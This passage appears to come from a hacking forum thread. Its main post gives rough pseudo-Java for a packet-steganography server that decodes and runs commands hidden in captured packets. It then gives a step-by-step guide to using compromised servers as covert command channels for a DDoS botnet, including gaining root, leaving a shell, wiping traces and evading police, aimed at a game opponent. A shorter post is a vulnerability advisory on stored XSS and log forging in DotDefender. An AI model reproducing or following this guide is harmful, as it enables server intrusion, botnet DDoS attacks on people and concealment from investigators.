String x3, String x4){ return grabHeader() + " 3A BB 0C FF 2D "+mod(x1)+" "+mod(x2)+" 3C "+mod(x3)+" 85 26 "+mod(x4)+grabFooter(); } } Code for the server(the server is not constantly loading all packets, it only works for a specific amount of time): import everything2.etc //you have to watch out the data storage for this one class ServerInner{ public void acceptEverything() { //kills program in 2 minutes long num = 2 * 60 * 1000; //min*sec*milli Timer t = new Timer(); t.schedule( new TimerTask(){public void run(){} }, num); // no this isn't a legit method, you'd want to use outside resources for this part //but at least the method dies in the two minute timeframe XClass.storeAllPackets(); } public void sortThrough(PacketList P, Method a){ int x=p.length() for(int i=0; i<p.length(); i++){ if(!a.follows(p.get(i))){ p.rem(i); i--; } } //after that method runs, the only packets left should be from you //obviously it is theoretically possible someone else did the exact same as you, so you'd then check them for(int i=0; i<p.length(); i++){ if(!a.check(p.get(i))){ p.rem(i); i--; } } //now all that's left is the correct one } public void finishUP(){ if(p.length()>0){ //translates the info packet from the correct IP if an ip was gathered translate(XClass.nextPacketFrom(p.get1IP()), a); //runs whatever it got run(); } //wipes all data that was stored, logs in database StartClass.wipe(); } } Rough Example in Real Life Application Packet steganography can also be used for sending out instructions to a botnet since you don't really need to send that much information to tell x to DDOS y, now do you? Here's a rough guide of how you'd accomplish communicate through your bots to start a DDOS attack w/ packet steganoraphy, from the setting up the server to the attacking the kid who beat you in MW3 1) Find a good server that has a decent amount of traffic, but nothing too sketchy. 2) Get root access on this server. 3) Download wireshark if you don't already have it. 4a)Write your program to test the wireshark logs to find a pattern in packet anomalies (you figure this one out on your own ). 4b)Write the program that can send out edited packets from your machine. 5) Set up another program that connects the wireshark program with your botnet server. 6) Set up a last program that wipes your traces of you fucking off with the server. 7) Run 6 and leave the shell you set up if you want (I suggest keeping some part of it intact though, depends on what you want to do). 8) Set up a couple more of these steno servers. 9) Realize that you can now send instructions easily but make it look like its a normal connection. Want to ddos server agh554? Connect with one of those servers and send the right kind of packets for a little while. Next thing you know your DDOS servers will be connecting with each other to get the details down and start the attack at the time specified. Because of the way the information is transferred from you to the server it'll be hard to trace the botnet back to you and then convict you as the one who pulled the strings behind a DDOS of a n00b MW3 player. I know that a couple people already do this, but now you know how too. Ending Thoughts (Read it though) So why the hell does this matter? A) all the data will look legitimate you can send it from different sources and it doesn't really matter as long as the packets are getting screwed correctly C) You think it's easy to look through every single packet sent to a server that gets a lot of traffic for the past 4ish months and then find the packets that link with the pattern? D) can be used for stuff other than botnets i) You can send encryption keys through this and then wipe the programs you installed. ii) anonymous communcation E) MITM attacks don't matter unless the MITM got your src(look at number 4) Problems with this? 1) Server gets taken by the feds. They won't be too happy about this 2) A wingding manages to replicate the correct stream, and then gives out commands for your server. This is something you'll just have to accept. Anonymity is what we are going for, too many traces = too many chances of someone finding a link 3) No well known VPNs allow packet modification at the moment. 4) if the feds got your SRC since you and 800 other skids are using the same program, and they catch you are modding packets, you're kinda screwed if they catch you redhanded 5) "I don't get it" Solutions to the problems 1) If modded packets are the only connections between your bots and your servers, its a lot harder to trace since the server has a massive amount of people using it 2) Nothing really, make it so it can't easily be replicated 3) wait for it [breathing intensifies] 4) Don't be a skid 5) See above. Or, read the links at the bottom of the page, learn something interesting, and prove to me that there are users with brains here Credits: TF
  24. Vulnerable soft: Applicure DotDefender (all versions) Vendor's site: Download dotDefender 5.00 & 5.13 Vulnerabilities: Persistent XSS,Log forging,Potential DoS When Discovered: 15 March 2015 Discovered by: AkaStep Under some circumstances this is possible attack DotDefender's admin interface and as result conduct PHISHING/Log forging/Potential Denial Of service against "Log Viewer" functionality. The main reason of vulnerability: DotDefenders Developers trusts to X-Forwarded-for HTTP Header and to it's variable (that is client side controllable) and sadly there is no any validation/sanitization of that variable and it's val. This vulnerability was successfully tested against for the following configurations:(in Lab/ Production environment) 1) Apache Traffic Server ===> Apache 2.4 2) Apache 2.4 with mod_proxy. Tested versions:(But other versions may also be affected) • dotDefender Version: 5.12-13217 • Web Server Type: Apache • Server Operating System: Linux • Web Server Version: Unknown • dotDefender Version: 5.13-13282 • Web Server Type: Apache • Server Operating System: Linux • Web Server Version: Unknown Read more: http://packetstorm.wowhacker.com/1503-exploits/DotDefender-XSS.pdf
×
×
  • Create New...